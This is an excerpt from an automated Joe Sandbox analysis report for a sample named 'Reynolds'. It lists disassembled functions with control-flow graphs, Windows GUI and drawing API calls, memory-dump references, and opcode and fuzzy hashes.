                                                                                                      control_flow_graph 1260 7ff7aa19f0c0-7ff7aa19f0e9 1261 7ff7aa19f0f5-7ff7aa19f111 1260->1261 1262 7ff7aa19f0eb-7ff7aa19f0f0 call 7ff7aa19f418 1260->1262 1264 7ff7aa19f113-7ff7aa19f116 1261->1264 1265 7ff7aa19f118-7ff7aa19f121 1261->1265 1270 7ff7aa19f3ff-7ff7aa19f416 1262->1270 1267 7ff7aa19f128-7ff7aa19f12e GetSysColor 1264->1267 1268 7ff7aa19f130-7ff7aa19f145 SetTextColor 1265->1268 1269 7ff7aa19f123 1265->1269 1267->1268 1271 7ff7aa19f166-7ff7aa19f173 CreateSolidBrush 1268->1271 1272 7ff7aa19f147-7ff7aa19f164 GetSysColorBrush GetSysColor 1268->1272 1269->1267 1273 7ff7aa19f17a-7ff7aa19f1a4 SetBkColor SelectObject 1271->1273 1272->1273 1274 7ff7aa19f1a6-7ff7aa19f1ec InflateRect GetSysColor CreateSolidBrush FrameRect DeleteObject 1273->1274 1275 7ff7aa19f1ee-7ff7aa19f1f1 1273->1275 1278 7ff7aa19f21d-7ff7aa19f22d 1274->1278 1276 7ff7aa19f1f3-7ff7aa19f200 InflateRect 1275->1276 1277 7ff7aa19f206-7ff7aa19f217 DrawFrameControl 1275->1277 1276->1277 1277->1278 1279 7ff7aa19f23f-7ff7aa19f247 1278->1279 1280 7ff7aa19f22f-7ff7aa19f23d InflateRect 1278->1280 1282 7ff7aa19f249 1279->1282 1283 7ff7aa19f24e-7ff7aa19f25a InflateRect 1279->1283 1281 7ff7aa19f25d-7ff7aa19f26f FillRect 1280->1281 1284 7ff7aa19f271-7ff7aa19f274 1281->1284 1285 7ff7aa19f276-7ff7aa19f27a 1281->1285 1282->1283 1283->1281 1284->1285 1286 7ff7aa19f27e-7ff7aa19f2b6 GetWindowLongW 1284->1286 1285->1286 1287 7ff7aa19f2b8-7ff7aa19f2bb 1286->1287 1288 7ff7aa19f2bd-7ff7aa19f2c1 1286->1288 1289 7ff7aa19f2c6-7ff7aa19f32f SendMessageW call 7ff7aa114aa8 GetWindowTextW DrawTextW 1287->1289 1288->1289 1290 7ff7aa19f2c3 1288->1290 1293 7ff7aa19f371-7ff7aa19f374 1289->1293 1294 7ff7aa19f331-7ff7aa19f36b GetSysColor SetTextColor DrawTextW 1289->1294 1290->1289 1295 7ff7aa19f3c3-7ff7aa19f3fa call 7ff7aa114a64 SelectObject DeleteObject SetTextColor SetBkColor 1293->1295 1296 7ff7aa19f376-7ff7aa19f3bd CreateSolidBrush FrameRect DeleteObject InflateRect DrawFocusRect 1293->1296 1294->1293 1295->1270 1296->1295
                                                                                                      APIs
                                                                                                      • GetSysColor.USER32(?,?,?,?,?,00000000,?,?,?,?,?,00007FF7AA1A198A,?,?,?,00007FF7AA13A2A5), ref: 00007FF7AA19F128
                                                                                                      • SetTextColor.GDI32(?,?,?,?,?,00000000,?,?,?,?,?,00007FF7AA1A198A,?,?,?,00007FF7AA13A2A5), ref: 00007FF7AA19F133
                                                                                                      • GetSysColorBrush.USER32(?,?,?,?,?,00000000,?,?,?,?,?,00007FF7AA1A198A,?,?,?,00007FF7AA13A2A5), ref: 00007FF7AA19F14C
                                                                                                      • GetSysColor.USER32(?,?,?,?,?,00000000,?,?,?,?,?,00007FF7AA1A198A,?,?,?,00007FF7AA13A2A5), ref: 00007FF7AA19F15E
                                                                                                      • SetBkColor.GDI32(?,?,?,?,?,00000000,?,?,?,?,?,00007FF7AA1A198A,?,?,?,00007FF7AA13A2A5), ref: 00007FF7AA19F17F
                                                                                                      • SelectObject.GDI32(?,?,?,?,?,00000000,?,?,?,?,?,00007FF7AA1A198A,?,?,?,00007FF7AA13A2A5), ref: 00007FF7AA19F18E
                                                                                                      • InflateRect.USER32(?,?,?,?,?,00000000,?,?,?,?,?,00007FF7AA1A198A,?,?,?,00007FF7AA13A2A5), ref: 00007FF7AA19F1B3
                                                                                                      • GetSysColor.USER32(?,?,?,?,?,00000000,?,?,?,?,?,00007FF7AA1A198A,?,?,?,00007FF7AA13A2A5), ref: 00007FF7AA19F1BE
                                                                                                      • CreateSolidBrush.GDI32(?,?,?,?,?,00000000,?,?,?,?,?,00007FF7AA1A198A,?,?,?,00007FF7AA13A2A5), ref: 00007FF7AA19F1C6
                                                                                                      • FrameRect.USER32(?,?,?,?,?,00000000,?,?,?,?,?,00007FF7AA1A198A,?,?,?,00007FF7AA13A2A5), ref: 00007FF7AA19F1D9
                                                                                                      • DeleteObject.GDI32(?,?,?,?,?,00000000,?,?,?,?,?,00007FF7AA1A198A,?,?,?,00007FF7AA13A2A5), ref: 00007FF7AA19F1E2
                                                                                                      • InflateRect.USER32(?,?,?,?,?,00000000,?,?,?,?,?,00007FF7AA1A198A,?,?,?,00007FF7AA13A2A5), ref: 00007FF7AA19F237
                                                                                                      • FillRect.USER32(?,?,?,?,?,00000000), ref: 00007FF7AA19F267
                                                                                                      • GetWindowLongW.USER32(?,?,?,?,?,00000000), ref: 00007FF7AA19F286
                                                                                                      • SendMessageW.USER32(?,?,?,?,?,00000000), ref: 00007FF7AA19F2D3
                                                                                                        • Part of subcall function 00007FF7AA19F418: GetSysColor.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA19F0F0), ref: 00007FF7AA19F45F
                                                                                                        • Part of subcall function 00007FF7AA19F418: SetTextColor.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA19F0F0), ref: 00007FF7AA19F46A
                                                                                                        • Part of subcall function 00007FF7AA19F418: GetSysColorBrush.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA19F0F0), ref: 00007FF7AA19F485
                                                                                                        • Part of subcall function 00007FF7AA19F418: GetSysColor.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA19F0F0), ref: 00007FF7AA19F498
                                                                                                        • Part of subcall function 00007FF7AA19F418: GetSysColor.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA19F0F0), ref: 00007FF7AA19F4C3
                                                                                                        • Part of subcall function 00007FF7AA19F418: CreatePen.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA19F0F0), ref: 00007FF7AA19F4DA
                                                                                                        • Part of subcall function 00007FF7AA19F418: SelectObject.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA19F0F0), ref: 00007FF7AA19F4EB
                                                                                                        • Part of subcall function 00007FF7AA19F418: SetBkColor.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA19F0F0), ref: 00007FF7AA19F4FB
                                                                                                        • Part of subcall function 00007FF7AA19F418: SelectObject.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA19F0F0), ref: 00007FF7AA19F50E
                                                                                                        • Part of subcall function 00007FF7AA19F418: InflateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA19F0F0), ref: 00007FF7AA19F535
                                                                                                        • Part of subcall function 00007FF7AA19F418: RoundRect.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA19F0F0), ref: 00007FF7AA19F561
                                                                                                        • Part of subcall function 00007FF7AA19F418: GetWindowLongW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA19F0F0), ref: 00007FF7AA19F56F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                                      • String ID:
                                                                                                      • API String ID: 3521893082-0
                                                                                                      • Opcode ID: f6b3e33df0b6fd49e851f84cb0d7e1a0081305ee093791da2a064367007aa246
                                                                                                      • Instruction ID: 0fb558512430256b723cd2240b5103d224725835d5020850045aa2e0e6826a96
                                                                                                      • Opcode Fuzzy Hash: f6b3e33df0b6fd49e851f84cb0d7e1a0081305ee093791da2a064367007aa246
                                                                                                      • Instruction Fuzzy Hash: 21A1B376F09701E6FB15AB61E84467C6771BB48BB8F954234DE2A03BA4DF3C9446C390
                                                                                                      Function 00007FF7AA19F418 Relevance: 39.2, APIs: 26, Instructions: 179windowCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • GetSysColor.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA19F0F0), ref: 00007FF7AA19F45F
                                                                                                      • SetTextColor.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA19F0F0), ref: 00007FF7AA19F46A
                                                                                                      • GetSysColorBrush.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA19F0F0), ref: 00007FF7AA19F485
                                                                                                      • GetSysColor.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA19F0F0), ref: 00007FF7AA19F498
                                                                                                      • CreateSolidBrush.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA19F0F0), ref: 00007FF7AA19F4A2
                                                                                                      • GetSysColor.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA19F0F0), ref: 00007FF7AA19F4C3
                                                                                                      • CreatePen.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA19F0F0), ref: 00007FF7AA19F4DA
                                                                                                      • SelectObject.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA19F0F0), ref: 00007FF7AA19F4EB
                                                                                                      • SetBkColor.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA19F0F0), ref: 00007FF7AA19F4FB
                                                                                                      • SelectObject.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA19F0F0), ref: 00007FF7AA19F50E
                                                                                                      • InflateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA19F0F0), ref: 00007FF7AA19F535
                                                                                                      • RoundRect.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA19F0F0), ref: 00007FF7AA19F561
                                                                                                      • GetWindowLongW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA19F0F0), ref: 00007FF7AA19F56F
                                                                                                      • SendMessageW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA19F0F0), ref: 00007FF7AA19F5BC
                                                                                                      • GetWindowTextW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA19F0F0), ref: 00007FF7AA19F5F4
                                                                                                      • InflateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA19F0F0), ref: 00007FF7AA19F617
                                                                                                      • DrawFocusRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA19F0F0), ref: 00007FF7AA19F625
                                                                                                      • GetSysColor.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA19F0F0), ref: 00007FF7AA19F634
                                                                                                      • SetTextColor.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA19F0F0), ref: 00007FF7AA19F63F
                                                                                                      • DrawTextW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA19F0F0), ref: 00007FF7AA19F65D
                                                                                                      • SelectObject.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA19F0F0), ref: 00007FF7AA19F67B
                                                                                                      • DeleteObject.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA19F0F0), ref: 00007FF7AA19F689
                                                                                                      • SelectObject.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA19F0F0), ref: 00007FF7AA19F697
                                                                                                      • DeleteObject.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA19F0F0), ref: 00007FF7AA19F6A2
                                                                                                      • SetTextColor.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA19F0F0), ref: 00007FF7AA19F6AE
                                                                                                      • SetBkColor.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA19F0F0), ref: 00007FF7AA19F6BE
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                      • String ID:
                                                                                                      • API String ID: 1996641542-0
                                                                                                      • Opcode ID: e7723dbef953c17b05f3a04d1756e8a1bd39c10ad02639bf65342523599ff9cc
                                                                                                      • Instruction ID: 2bf5eb38ce6d8236dfa01b5bcb4fcdf958d99004f523578c1704121b2a88f338
                                                                                                      • Opcode Fuzzy Hash: e7723dbef953c17b05f3a04d1756e8a1bd39c10ad02639bf65342523599ff9cc
                                                                                                      • Instruction Fuzzy Hash: C271AF76A0DA41E6F611AB21F84467AB372FB88BB4F414239DD5E43BA4DF3CD4468710
                                                                                                      Function 00007FF7AA0F2340 Relevance: 28.7, APIs: 19, Instructions: 201COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 2347 7ff7aa0f2340-7ff7aa0f2398 call 7ff7aa0f2470 GetSysColor 2350 7ff7aa13a18b-7ff7aa13a1a0 SetBkColor call 7ff7aa0f21a0 2347->2350 2351 7ff7aa0f239e-7ff7aa0f23c2 2347->2351 2353 7ff7aa139fbc-7ff7aa139fbf 2351->2353 2354 7ff7aa0f23c8-7ff7aa0f23cc 2351->2354 2353->2354 2356 7ff7aa139fc5-7ff7aa139fc7 2353->2356 2357 7ff7aa0f23d2-7ff7aa0f23d4 2354->2357 2358 7ff7aa139fcc-7ff7aa139fce 2354->2358 2359 7ff7aa0f23fb-7ff7aa0f2403 2356->2359 2360 7ff7aa13a099 2357->2360 2361 7ff7aa0f23da-7ff7aa0f23dc 2357->2361 2358->2359 2362 7ff7aa139fd4-7ff7aa139fd6 2358->2362 2363 7ff7aa13a0c7-7ff7aa13a0cf 2359->2363 2364 7ff7aa0f2409-7ff7aa0f2413 2359->2364 2365 7ff7aa13a09e-7ff7aa13a0a6 GetSysColor 2360->2365 2361->2359 2366 7ff7aa0f23de-7ff7aa0f23e0 2361->2366 2367 7ff7aa139fdc-7ff7aa139fdf 2362->2367 2368 7ff7aa13a0ab-7ff7aa13a0be GetWindowLongW 2362->2368 2363->2364 2372 7ff7aa13a0d5-7ff7aa13a0d9 2363->2372 2369 7ff7aa0f2415-7ff7aa0f241e GetSysColor 2364->2369 2370 7ff7aa0f2420-7ff7aa0f242c SetTextColor 2364->2370 2365->2359 2366->2360 2373 7ff7aa0f23e6-7ff7aa0f23e8 2366->2373 2367->2360 2374 7ff7aa139fe5 2367->2374 2368->2360 2371 7ff7aa13a0c0-7ff7aa13a0c5 2368->2371 2369->2370 2370->2350 2377 7ff7aa0f2432-7ff7aa0f2465 SetBkMode GetStockObject 2370->2377 2371->2365 2378 7ff7aa13a0db-7ff7aa13a0de 2372->2378 2379 7ff7aa13a0e3-7ff7aa13a0e5 2372->2379 2375 7ff7aa0f2466-7ff7aa0f246d 2373->2375 2380 7ff7aa0f23ea-7ff7aa0f23ec 2373->2380 2374->2375 2376 7ff7aa139feb-7ff7aa139fed 2374->2376 2375->2359 2376->2368 2382 7ff7aa139ff3-7ff7aa139ff5 2376->2382 2378->2364 2379->2364 2383 7ff7aa13a0eb-7ff7aa13a0ed 2379->2383 2380->2359 2381 7ff7aa0f23ee 2380->2381 2381->2375 2384 7ff7aa0f23f0-7ff7aa0f23f2 2381->2384 2382->2375 2385 7ff7aa139ffb-7ff7aa139ffd 2382->2385 2383->2364 2386 7ff7aa13a0f3-7ff7aa13a114 GetWindowDC GetPixel 2383->2386 2384->2375 2387 7ff7aa0f23f4-7ff7aa0f23f6 2384->2387 2388 7ff7aa0f23f8 2385->2388 2389 7ff7aa13a003-7ff7aa13a005 2385->2389 2390 7ff7aa13a170-7ff7aa13a186 ReleaseDC 2386->2390 2391 7ff7aa13a116-7ff7aa13a131 GetPixel 2386->2391 2387->2375 2387->2388 2388->2359 2392 7ff7aa13a007-7ff7aa13a009 2389->2392 2393 7ff7aa13a014-7ff7aa13a01c 2389->2393 2390->2364 2391->2390 2394 7ff7aa13a133-7ff7aa13a14d GetPixel 2391->2394 2392->2359 2395 7ff7aa13a00f 2392->2395 2393->2364 2397 7ff7aa13a022-7ff7aa13a085 GetClientRect SendMessageW GetWindowDC GetPixel ReleaseDC 2393->2397 2394->2390 2396 7ff7aa13a14f-7ff7aa13a16e GetPixel 2394->2396 2395->2375 2396->2390 2397->2359 2398 7ff7aa13a08b-7ff7aa13a097 2397->2398 2398->2360 2398->2365
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Color$LongWindow$ModeObjectStockText
                                                                                                      • String ID:
                                                                                                      • API String ID: 554392163-0
                                                                                                      • Opcode ID: cc65a1f5085739bdf730f5a57d68a81d83072d1dd34cd411bf68f0558776c384
                                                                                                      • Instruction ID: 5fcea3add2073f5e00180c08b23f4d8c039f1462f91327c1e97cd8656e8de8ba
                                                                                                      • Opcode Fuzzy Hash: cc65a1f5085739bdf730f5a57d68a81d83072d1dd34cd411bf68f0558776c384
                                                                                                      • Instruction Fuzzy Hash: 8181F872E0D653D5FA75AB24E44427EA3A1EF49764FD60275C99E036F4EE3CA8438320
                                                                                                      Function 000002453CA22450 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 199COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 2399 2453ca22450-2453ca2246c 2400 2453ca2246e 2399->2400 2401 2453ca22471-2453ca22474 2399->2401 2400->2401 2402 2453ca22476-2453ca22479 2401->2402 2403 2453ca224c3-2453ca224d0 _errno 2401->2403 2402->2403 2404 2453ca2247b-2453ca2247f 2402->2404 2405 2453ca226ea-2453ca226fa 2403->2405 2406 2453ca22480-2453ca22493 iswctype 2404->2406 2406->2406 2407 2453ca22495-2453ca224ae 2406->2407 2408 2453ca224d5-2453ca224da 2407->2408 2409 2453ca224b0-2453ca224b3 2407->2409 2412 2453ca224dc-2453ca224ea 2408->2412 2413 2453ca2250f 2408->2413 2410 2453ca224b5-2453ca224bf 2409->2410 2411 2453ca22514-2453ca2252c iswctype 2409->2411 2410->2411 2416 2453ca224c1 2410->2416 2414 2453ca2255e-2453ca22565 2411->2414 2415 2453ca2252e-2453ca22542 iswctype 2411->2415 2417 2453ca224ec-2453ca224f1 2412->2417 2418 2453ca224f3-2453ca224fe 2412->2418 2413->2411 2414->2405 2422 2453ca2256b-2453ca2256d 2414->2422 2415->2414 2421 2453ca22544-2453ca2254f iswctype 2415->2421 2416->2418 2417->2411 2419 2453ca22508-2453ca2250d 2418->2419 2420 2453ca22500-2453ca22504 2418->2420 2419->2411 2420->2419 2423 2453ca22555-2453ca22559 2421->2423 2424 2453ca226b0-2453ca226b2 2421->2424 2422->2405 2425 2453ca22573-2453ca2257b 2422->2425 2423->2414 2424->2405 2426 2453ca2259f-2453ca225bd iswctype 2425->2426 2427 2453ca225bf-2453ca225d3 iswctype 2426->2427 2428 2453ca225f0-2453ca225f5 2426->2428 2427->2428 2431 2453ca225d5-2453ca225e0 iswctype 2427->2431 2429 2453ca226ab-2453ca226ae 2428->2429 2430 2453ca225fb-2453ca225fd 2428->2430 2433 2453ca226ba-2453ca226bd 2429->2433 2430->2429 2432 2453ca22603-2453ca22615 2430->2432 2431->2429 2434 2453ca225e6-2453ca225ef 2431->2434 2435 2453ca2261b-2453ca2261f 2432->2435 2436 2453ca22580-2453ca2259c 2432->2436 2437 2453ca226bf 2433->2437 2438 2453ca226c2-2453ca226c5 2433->2438 2434->2428 2441 2453ca22620-2453ca22638 iswctype 2435->2441 2436->2426 2437->2438 2439 2453ca226c7-2453ca226d9 _errno 2438->2439 2440 2453ca226db-2453ca226e6 2438->2440 2439->2405 2440->2405 2442 2453ca2263a-2453ca2264e iswctype 2441->2442 2443 2453ca22670-2453ca2267b 2441->2443 2442->2443 2444 2453ca22650-2453ca2265b iswctype 2442->2444 2443->2433 2445 2453ca2267d-2453ca2267f 2443->2445 2446 2453ca2265d-2453ca22666 2444->2446 2447 2453ca226b4 2444->2447 2445->2433 2448 2453ca22681-2453ca22697 2445->2448 2446->2443 2447->2433 2448->2441 2449 2453ca22699-2453ca226a6 2448->2449 2449->2436
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2312180188.000002453CA20000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002453CA20000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_2453ca20000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: iswctype$_errno
                                                                                                      • String ID: 0$0
                                                                                                      • API String ID: 3860680865-203156872
                                                                                                      • Opcode ID: 7b61383585585895d8496f83563b6520f5b943430406a0f239e9d859c94a1f81
                                                                                                      • Instruction ID: 3b46aac884f29b2f5dda34a297036be44cd70fe0871c4e3ee26a273495da2235
                                                                                                      • Opcode Fuzzy Hash: 7b61383585585895d8496f83563b6520f5b943430406a0f239e9d859c94a1f81
                                                                                                      • Instruction Fuzzy Hash: C2611463200C3943FB2A5E7988387BA2D91EB947F4F0583A5E9F7463C7E66DD4C19210
                                                                                                      Function 00007FF7AA1A19D4 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 162windowfileCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreenwcscat
                                                                                                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                      • API String ID: 2091158083-3440237614
                                                                                                      • Opcode ID: a6383f7ad2c15784484526503c134a2164f43bfe7e3a3a9e6e3dd31a7eae073a
                                                                                                      • Instruction ID: 1172eeec7af921031a3c3ac716fe1b51e069853cb6aec8a7c1680279e0c3bda1
                                                                                                      • Opcode Fuzzy Hash: a6383f7ad2c15784484526503c134a2164f43bfe7e3a3a9e6e3dd31a7eae073a
                                                                                                      • Instruction Fuzzy Hash: 30715E72619A82E6F711EB25F4407EEA731FB84798F810072EA4D47AA9DF7CD14AC710
                                                                                                      Function 00007FF7AA1A0898 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 175windowlibraryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Load$Image$IconLibraryMessageSend_invalid_parameter_noinfo$DestroyExtractFree
                                                                                                      • String ID: .dll$.exe$.icl
                                                                                                      • API String ID: 258715311-1154884017
                                                                                                      • Opcode ID: 6a1298940e1642c5f8eac90391968d97117fa4591b4f58ce6483caa2bbefa5f3
                                                                                                      • Instruction ID: 8c461bf07d11c0740603d6db16576a51aedd10b5d9bbe9142a77f27d401a4d49
                                                                                                      • Opcode Fuzzy Hash: 6a1298940e1642c5f8eac90391968d97117fa4591b4f58ce6483caa2bbefa5f3
                                                                                                      • Instruction Fuzzy Hash: 5771C672A0AB12D6FB62AF21E440679B2B0FB44BA8F864275DD1E477B5DF3CD4468310
                                                                                                      Function 00007FF7AA1A0B50 Relevance: 22.6, APIs: 15, Instructions: 131filememorywindowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
